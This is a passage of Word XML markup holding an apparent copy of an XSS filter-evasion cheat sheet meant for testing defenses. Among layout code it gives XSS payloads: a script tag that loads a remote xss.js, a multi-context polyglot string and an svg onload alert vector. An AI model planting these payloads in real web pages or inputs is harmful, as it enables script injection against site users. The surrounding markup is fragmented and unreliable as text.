      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cheat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>lists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series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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacks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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>defensive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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filtering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incomplete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>defense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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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illustrate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="112"/>
      </w:pPr>
      <w:r>
        <w:t>Basic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Evasion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3" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pP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normal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>injection,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most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>likely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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>caught</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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suggest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>trying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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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modern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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omitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here):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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2453640" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1410" name="Group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3640" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="3864" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1411" name="Freeform 1413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3864" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5457 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3864"/>
                              <a:gd name="T2" fmla="+- 0 347 165"/>
                              <a:gd name="T3" fmla="*/ 347 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3864"/>
                              <a:gd name="T6" fmla="+- 0 347 165"/>
                              <a:gd name="T7" fmla="*/ 347 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3864"/>
                              <a:gd name="T10" fmla="+- 0 347 165"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3864"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3864"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3864"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3864"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5457 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3864"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5478 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3864"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5478 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3864"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5460 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3864"/>
                              <a:gd name="T42" fmla="+- 0 347 165"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5457 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3864"/>
                              <a:gd name="T46" fmla="+- 0 347 165"/>
                              <a:gd name="T47" fmla="*/ 34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864" h="183">
                                <a:moveTo>
                                  <a:pt x="384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843" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3864" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3864" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3846" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="384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" name="Text Box 1412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386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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId8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http://xss.rocks/xss.js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&gt;&lt;/SCRIPT&gt;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1" o:spid="_x0000_s1026" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:193.2pt;height:9.15pt;z-index:-15728640;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1614,165" coordsize="386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">
                <v:shape id="Freeform 1413" o:spid="_x0000_s1027" style="position:absolute;left:1614;top:165;width:3864;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="386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vdF8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/6HZQpeRDeRKjZ1FVspePUJ3obsNJs2&#10;O5tkV43/vlso9DYf33MWq85W4katLx0rSMcJCOLc6ZILBcfDx2gOwgdkjZVjUvAgD6tlv7fATLs7&#10;7+i2D4WIIewzVGBCqDMpfW7Ioh+7mjhyn661GCJsC6lbvMdwW8lJksykxZJjg8Ga3g3l3/urVdC8&#10;nYaXr/PLadaYDeEk2Uyb80GpwVO3fgURqAv/4j/3Vsf5z2kKv9/EE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vdF8MAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m3843,182l21,182r-3,l,161r,-3l,21,21,,3843,r21,21l3864,161r-18,21l3843,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3843,347;21,347;18,347;0,326;0,323;0,186;21,165;3843,165;3864,186;3864,326;3846,347;3843,347" o:connectangles="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12" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:386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BgkMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TRURrUaRRWFBWLZ2D3scm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCr7yw2gBwgdkjbVjUvAgD9tNv7fGVLs7&#10;Z3Q7hVLEEPYpKqhCaFIpfVGRRT92DXHkLq61GCJsS6lbvMdwW8tpksylRcOxocKG3ioqrqdfq2D3&#10;zdne/HycP7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fTab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BgkM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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId9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http://xss.rocks/xss.js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&gt;&lt;/SCRIPT&gt;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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Locator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Polygot)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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pP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"polygot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>payload."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execute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multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>contexts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>html,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>string,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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URL.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Thank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hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Gareth</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Heyes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>for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hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>contribution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3148330" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1407" name="Group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8330" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="4958" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1408" name="Freeform 1410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4958" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6551 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4958"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4958"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4958"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4958"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4958"/>
                              <a:gd name="T18" fmla="+- 0 323 166"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4958"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4958"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6551 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4958"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6572 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4958"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6572 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4958"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6554 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4958"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6551 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4958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958" h="183">
                                <a:moveTo>
                                  <a:pt x="4937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937" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4958" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4958" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4940" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493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" name="Text Box 1409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495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javascript:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;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/script&gt;&lt;/xmp&gt;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08" o:spid="_x0000_s1029" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:247.9pt;height:9.15pt;z-index:-15728128;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1614,166" coordsize="4958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">
                <v:shape id="Freeform 1410" o:spid="_x0000_s1030" style="position:absolute;left:1614;top:165;width:4958;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="495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/QRMcA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPMW/CQAyFdyT+w8mVulRwobSAUg4UiioYWBpY2Kyc&#10;m0TN+aLcNaT/vh4qsdl6z+99Xm8H16ieulB7NjCbJqCIC29rLg1czh+TFagQkS02nsnALwXYbsaj&#10;NabW3/iT+jyWSkI4pGigirFNtQ5FRQ7D1LfEon35zmGUtSu17fAm4a7Rz0my0A5rloYKW3qvqPjO&#10;f5yBdnnN+oN/zbLTLN/7JxsO893KmMeHIXsDFWmId/P/9dEK/ksiuPKNjK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/0ETHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m4937,182l21,182r-3,-1l,161r,-4l,21,21,,4937,r21,21l4958,161r-18,20l4937,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4937,348;21,348;18,347;0,327;0,323;0,187;21,166;4937,166;4958,187;4958,327;4940,347;4937,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1409" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:4958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1kPMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H/g/hBP2NhPHkLUaRWSDwUBW64OPZ3O2&#10;webSNZl2/70ZDHy7j+/nLVaDa8WF+mA9a5hOFAjiyhvLtYZ9+f70CiJEZIOtZ9LwSwFWy9HDAnPj&#10;r1zQZRdrkUI45KihibHLpQxVQw7DxHfEiTv53mFMsK+l6fGawl0rn5WaSYeWU0ODHW0aqs67H6dh&#10;feDizX5vj1/FqbBlmSn+nJ21fhwP6zmISEO8i//dHybNf1EZ/H2TTp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tZDz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javascript:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;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/script&gt;&lt;/xmp&gt;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8"/>
        <w:rPr>
          <w:sz w:val="4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2940050" cy="116205"/>
                <wp:effectExtent l="5715" t="6350" r="6985" b="1270"/>
                <wp:docPr id="1404" name="Group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050" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4630" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1405" name="Freeform 140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630" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4608 w 4630"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 4630"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 4630"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 4630"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 4630"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 4630"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 4630"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 4608 w 4630"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 4629 w 4630"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 4629 w 4630"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 4611 w 4630"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 4608 w 4630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630" h="183">
                                <a:moveTo>
                                  <a:pt x="460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608" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4629" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4629" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4611" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="460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" name="Text Box 140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3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&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'&gt;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05" o:spid="_x0000_s1032" style="width:231.5pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="463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">
                <v:shape id="Freeform 1407" o:spid="_x0000_s1033" style="position:absolute;width:4630;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="463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2yhsIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/6HZQpepG6URkrqKj6h6knbQ49DdpoN&#10;ZmdDdjXpv+8Kgrf5+J4zW3S2EjdqfOlYwXiUgCDOnS65UPD9tXt9B+EDssbKMSn4Iw+Leb83w0y7&#10;lk90O4dCxBD2GSowIdSZlD43ZNGPXE0cuV/XWAwRNoXUDbYx3FZykiRTabHk2GCwprWh/HK+WgWX&#10;1Sbd24oMpttjG/BAP8P8qtTgpVt+gAjUhaf44f7Ucf5bksL9m3iC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vbKGwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m4608,182l21,182r-3,l,161r,-3l,21,21,,4608,r21,21l4629,161r-18,21l4608,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4608,182;21,182;18,182;0,161;0,158;0,21;21,0;4608,0;4629,21;4629,161;4611,182;4608,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1406" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;width:463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LwTsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H+x/CCfsbSaOUVw1iowNhIFYu4c9ns3Z&#10;BptL10Tt/nsjCHu7j+/nzZeDa8WZ+mA9a5iMFQjiyhvLtYbv8vN5CiJEZIOtZ9LwRwGWi8eHOebG&#10;X7ig8y7WIoVwyFFDE2OXSxmqhhyGse+IE3fwvcOYYF9L0+MlhbtWviiVSYeWU0ODHb03VB13J6dh&#10;9cPFh/3d7LfFobBl+ab4Kztq/TQaVjMQkYb4L7671ybNf1UZ3L5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LwT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&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'&gt;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3"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Directive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before="1" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="347"/>
      </w:pPr>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(IE7.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>support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Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directive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context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image,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>does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contexts,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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show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principles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tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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well:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1975485" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1401" name="Group 1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5485" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="3111" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1402" name="Freeform 1404"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="164"/>
                            <a:ext cx="3111" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4704 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3111"/>
                              <a:gd name="T2" fmla="+- 0 347 165"/>
                              <a:gd name="T3" fmla="*/ 347 h 183"/>
